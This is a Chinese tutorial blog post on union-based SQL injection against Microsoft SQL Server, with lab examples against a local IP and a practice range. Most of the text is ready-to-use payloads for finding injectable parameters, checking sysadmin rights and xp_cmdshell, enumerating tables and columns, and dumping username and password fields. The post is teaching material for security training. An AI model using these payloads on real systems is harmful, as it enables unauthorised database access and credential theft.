MSSQL之联合注入

本章目录:

联合查询注入语句

  • 第一步 判断注入

    and 1=1

    and 1=2

  • 第二步 猜解列数(字段长度)

    order by 1 返回正确

    order by 2 返回正确

    order by 3 出现错误

    ?id=-2union all select null,null,null,null--
    //在第四个的时候页面显示正常,说明字段为4

    ?id=2and 1=(select is_srvrolemember(‘sysadmin’))
    //判断是否是系统管理员

    ?id=2and 1=(select is_srvrolemember(‘db_owner’))
    //判断是否是库权限

    ?id=2and 1=(select is_srvrolemember(‘public’))
    //判断是否为public权限

    可以直接不用加 - 报错

    判断回显位的位置:?id=-2union all select ‘1’,‘2’,‘3’,‘4’-- 页面显示2,3,说明回显点为2,3字段处

利用回显点权限判断

?id=-1073UNION ALL SELECT NULL, 回显点 ,NULL,NULL--
//一般都是代入在这语句的回显点中

其实这里面在后面添加的--或者#是因为代入数据库查询的时候系统可能会给你附加一些语句,这些语句都有可能会影响你的代码,所以就可以加这个注释掉。

  • @@version //主机版本

  • system_user //系统用户名

  • suser_sname() //查出当前操作数据库的登入名

  • user //当前用户名

  • db_name() //当前数据库名

    db_name(7) //快速查询库名,1-6为系统库,7开始为其他库

  • (select host_name()) //主机名

  • (select count(*) from master.dbo.sysobjects where xtype=‘X’ and name=‘xp_cmdshell’)

//判断是否有xp_cmdshell扩展存储,1为存在

  • 同理:(select count(*) from master.dbo.sysobjects where name=‘xp_regread’)

//判断是否有xp_regread扩展存储,1为存在

查库:

  • (select name from master.dbo.sysdatabases where dbid=7)
    //修改dbid数值,快速查询库名,1-6为系统库

查表:

  • (select top 1 name from sysobjects where xtype=‘U’) //查询当前库第一个表名

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in (‘表名1’,‘表名2’)) //查询其他表

  • (select top 1 table_name from master.information_schema.tables) //查询master库第一个表名

  • (select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) //查询bbs库第一个表名

  • (select top 1 table_name from information_schema.tables where table_name not in (‘表名1’,‘表名2’)) //查询其他表(不包括)

  • (select name from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

  • (select ‘|’%2bname%2b’|’ from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

同上一条,这是过滤用的,将空格编码化了

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in(select top 0 name from sysobjects where xtype=‘u’))
    ///(select top 0 name from ) 变化0来快速查询

墨者学院例,查表名:
?id=-1073UNION ALL SELECT NULL,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=‘dbo’),NULL,NULL--
//结果:manage

查列名:

  • (select top 1 name from syscolumns where id=object_id(‘admin’))
    //查询当前库admin表的第一个列名

  • (select top 1 name from syscolumns where id=object_id(‘admin’) and name not in(‘列名1’,‘列名2’)
    //查询当前库admin表的其他列名(也是不包括原理)

  • (select top 1 column_name from information_schema.columns where table_name=‘admin’ and column_name not in(‘列名1’,‘列名2’))
    //查询当前库admin表的其他列名

  • (select name from syscolumns where id=object_id(‘admin’) FOR XML PATH(’’))
    //快速查询所有列

例:
?id=-2union all select ‘1’,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),‘1’,‘1’--
//根据col_name()函数中的数字来决定显示的字段,1对应id,2对应username,3对应password

查列内容:

例:

  • ?id=-2union all select null,username,password,null from manage--
    ///直接代列名到回显点里面,然后from 表名--

  • (select password,username from manage FOR XML PATH(’’))
    //快速查询manage表里所有值

  • (select top 1 password from admin where password not in (‘值1’,‘值2’))
    //查询其他值

  • (select top 1 password from bbs.dbo.admin)
    //查询bbs库admin表password列的第一个值

-----------------------------------------------------------------------------------------------------------------

联合注入例:

mssql联合注入我们一般不使用 数字占位,而是null,因为你使用数字占位可能会发生隐式转换


http://192.168.130.137/1.aspx?id=1 union select 1,2,3

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/F38094C18DB74056BB2B00539AC9AA3C/11954


http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/8216FC733901409E93A0A4A7471DEA4D/11952

当然也可以这样用


http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/A29D1B4D80DC471590A226D2BD2FB3FF/11955

在mssql中我们如果想查询多条数据可以使用%2B 也就是加号

http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/9C25C6F56B7140F4B0C7EE127138F7A0/11953

原文地址:https://blog.csdn.net/qq_38265674/article/details/111623280

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


本篇内容主要讲解“sqlalchemy的常用数据类型怎么使用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“sqlalche...
今天小编给大家分享一下sqlServer实现分页查询的方式有哪些的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家
这篇文章主要介绍“sqlmap之osshell怎么使用”,在日常操作中,相信很多人在sqlmap之osshell怎么使用问题上存在疑惑,小编查阅了各式资料,整理出
本篇内容介绍了“SQL注入的知识点有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧...
1. mssql权限sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限db权限:文件管理,数据库操作等 users-administratorspublic权限:数据库操作 guest-users2、sql server注入执行命令查
sql执行计划如何查看?在SPL庞大的数据中我们不知道如何查看实际数据库中发生了什么事情,有必要定期进行查询优化和索引否则会影响我们后期的SQL的查询速度。那么针对这样的问题我们必须要知道SQL执行的计划,在本文中winwin7小编给大家分享下SQL执
SQL Server 是Microsoft 公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点应用非常广泛。不过在使用中,我们会遇到非常多的错误,面对这么庞大的数据库环境,当然会有精确的错误代码的对照季,下面小编分享的
SQL Server本地账户无法登陆出现错误提示:error:40-Could not open a connenction to SQL Server的问题很常见,对于初学者来说可能不知道如何解决,一起来看看下面的解决方案。解决步骤如下:1、这种情况需要开启 SQL Server service
微软推出的SQL2008是一款非常好用的数据库软件,它稳定、功能强大,为众多企业提供了最佳的数据库解决方案,那么我们如何在Windows中安装它呢,一些朋友对SQL Server 2008的安装过程还不是很熟悉,下面就一起来看看SQL Server 2008详细安装图解...
本页概要如果您使用的是 SQL Server 2005备份和还原Sp_detach_db 和 Sp_attach_db 存储过程关于排序规则的说明导入和导出数据(在 SQL Server 数据库之间复
DBCC CHECKIDENT 检查指定表的当前标识值,如有必要,还对标识值进行更正。 语法 DBCC CHECKIDENT ( 'table_name' [ , { NORESEED
这里对 SQL Server 字符串函数进行分门别类地列出,便于查阅和记忆,相信大家都在其它方面有高深的编程基础,从字面上来说大家都知道这些函数的意义,就不对这些函数作过多的解释了,主要谈些经验,具体
查询及删除重复记录的方法 1、查找表(people)中多余的重复记录,重复记录是根据单个字段(peopleId)来判断select*frompeoplewherepeopleIdin(selectpe
微软发SQL Server 2008第二个CTP预览版from: http://news.csdn.net/n/20070807/107158.html8月7日消息,微软公司本周发布了SQL Serv
症状当您将数据库备份恢复到另一台服务器时,可能会遇到孤立用户的问题。SQL Server 联机丛书中的孤立用户疑难解答主题中没有讲述解决此问题的具体步骤。本文介绍了如何解决孤立用户问题。更多信息虽然术
当登录SQL Server 2005时可能碰到错误: 'No Process is on the Other End of the Pipe'。解决方法:(1)Open up SQL
概要本文描述如何映射标准登录和集成登录来解决在运行 SQL Server 的服务器之间移动数据库时的权限问题。更多信息当您将数据库从一个运行 SQL Server 的服务器移到另一个运行 SQL Se
----------------------------------------问题:该用户与可信的SQL SERVER 连接无关联使用sa用户或自建用户使用“SQL SERVER 身份认证”连接数据
更新日期: 2007 年 5 月 20 日 使用下表可以确定各种版本的 Microsoft SQL Server 2005 支持哪些功能。有关 SQL Server 2005 Enterprise E
当从Excel导入数据到Sql Sever中,可能会出现以下问题:
对于指定的缓冲区大小而言,源列的数据太大